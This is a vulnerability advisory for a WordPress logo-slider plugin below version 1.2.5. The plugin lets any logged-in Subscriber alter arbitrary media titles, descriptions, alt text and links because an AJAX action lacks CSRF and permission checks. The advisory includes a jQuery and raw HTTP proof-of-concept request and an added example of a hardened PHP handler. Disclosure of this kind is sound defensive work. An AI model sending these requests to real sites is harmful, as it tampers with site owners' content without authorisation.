WordPress Plugin Vulnerabilities
Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update
Description
The plugin does not perform CSRF or authorisation checks in the lswss_save_attachment_data AJAX action, allowing any authenticated user, such as a Subscriber, to change the title, description, alt text, and URL of arbitrary uploaded media.
Proof of Concept
jQuery.post(ajaxurl, {
    action: "lswss_save_attachment_data",
    attachment_id: 564,
    form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20by%20subscriber&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Connection: close
Cookie: [any authenticated user]

action=lswss_save_attachment_data&attachment_id=2133&form_data=lswss_attachment_title%3DTest%26lswss_attachment_desc%3DChanged%2520by%2520subscriber%26lswss_attachment_alt%3DAlt%2520text%26lswss_attachment_link%3D
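For developers reviewing their own handlers, here is what an AJAX handler for this action looks like once the two missing checks are in place. This is an added example, not the plugin's source or its 1.2.5 fix. The handler name, the nonce action and field name, and the `_lswss_demo_link` meta key are assumptions; the action name and form field names are taken from the request above.

```php
<?php
// Added example, not the plugin's code. Hypothetical names: the handler function,
// the nonce action 'lswss_demo_save_attachment', the 'nonce' request field and
// the '_lswss_demo_link' meta key.
// Registered on wp_ajax_ only (no wp_ajax_nopriv_), so a login is still required.
add_action( 'wp_ajax_lswss_save_attachment_data', 'lswss_demo_save_attachment_data' );

function lswss_demo_save_attachment_data() {
    // CSRF check: terminates the request unless a valid nonce for this action is sent.
    check_ajax_referer( 'lswss_demo_save_attachment', 'nonce' );

    // The target must be an existing post of type 'attachment'.
    $attachment_id = isset( $_POST['attachment_id'] ) ? absint( $_POST['attachment_id'] ) : 0;
    if ( ! $attachment_id || 'attachment' !== get_post_type( $attachment_id ) ) {
        wp_send_json_error( 'Invalid attachment', 400 );
    }

    // Authorisation check on the specific object; a Subscriber does not pass it
    // for media they cannot edit.
    if ( ! current_user_can( 'edit_post', $attachment_id ) ) {
        wp_send_json_error( 'Forbidden', 403 );
    }

    // form_data is a URL-encoded string nested inside the POST body; parse it
    // into an array and accept only string values for the expected keys.
    $raw  = isset( $_POST['form_data'] ) ? wp_unslash( (string) $_POST['form_data'] ) : '';
    $form = array();
    wp_parse_str( $raw, $form );
    $field = static function ( $key ) use ( $form ) {
        return isset( $form[ $key ] ) && is_string( $form[ $key ] ) ? $form[ $key ] : '';
    };

    // Sanitise each value for its destination before writing it.
    $alt  = sanitize_text_field( $field( 'lswss_attachment_alt' ) );
    $link = esc_url_raw( $field( 'lswss_attachment_link' ) );
    wp_update_post( wp_slash( array(
        'ID'           => $attachment_id,
        'post_title'   => sanitize_text_field( $field( 'lswss_attachment_title' ) ),
        'post_content' => sanitize_textarea_field( $field( 'lswss_attachment_desc' ) ),
    ) ) );
    update_post_meta( $attachment_id, '_wp_attachment_image_alt', wp_slash( $alt ) );
    update_post_meta( $attachment_id, '_lswss_demo_link', wp_slash( $link ) );

    wp_send_json_success();
}
```

The admin page that issues the request has to supply the matching nonce, for example by passing `wp_create_nonce( 'lswss_demo_save_attachment' )` to the script with `wp_localize_script()`.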
Affects Plugins
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-24
Added
2022-01-31
Last Updated
2022-04-09